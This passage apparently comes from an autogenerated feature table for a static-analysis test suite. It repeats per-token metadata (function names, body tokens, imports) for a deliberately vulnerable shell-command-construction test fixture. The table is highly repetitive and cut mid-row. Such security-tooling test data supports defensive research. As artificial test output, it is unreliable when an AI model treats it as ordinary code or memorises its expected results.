name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:434:12:434:20 | 'convert' | receiverName | arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:6 | first | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:25 | first & ... (first) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:25 | first & ... (first) | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:25 | first & ... (first) | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:25 | first & ... (first) | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:2:435:25 | first & ... (first) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:13 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:13 | arr | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:13 | arr | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:13 | arr | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:13 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:18 | arr.push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:18 | arr.push | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:18 | arr.push | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:18 | arr.push | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:18 | arr.push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | arr.push(first) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | arr.push(first) | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | arr.push(first) | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | arr.push(first) | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | arr.push(first) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | exceptional return of arr.push(first) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | exceptional return of arr.push(first) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | exceptional return of arr.push(first) | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | exceptional return of arr.push(first) | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:11:435:25 | exceptional return of arr.push(first) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:15:435:18 | push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:15:435:18 | push | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:15:435:18 | push | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:15:435:18 | push | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:15:435:18 | push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | CalleeFlexibleAccessPath | arr.push | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:435:20:435:24 | first | receiverName | arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:5 | last | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:23 | last && ... h(last) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:23 | last && ... h(last) | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:23 | last && ... h(last) | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:23 | last && ... h(last) | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:2:436:23 | last && ... h(last) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:12 | arr | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:12 | arr | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:12 | arr | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:12 | arr | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:12 | arr | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:17 | arr.push | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:17 | arr.push | contextSurroundingFunctionParameters | (first, last) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:17 | arr.push | enclosingFunctionBody | first last arr something gm arr push convert first arr push first last arr push last arr | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:17 | arr.push | enclosingFunctionName | build | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:17 | arr.push | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:436:10:436:23 | arr.push(last) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 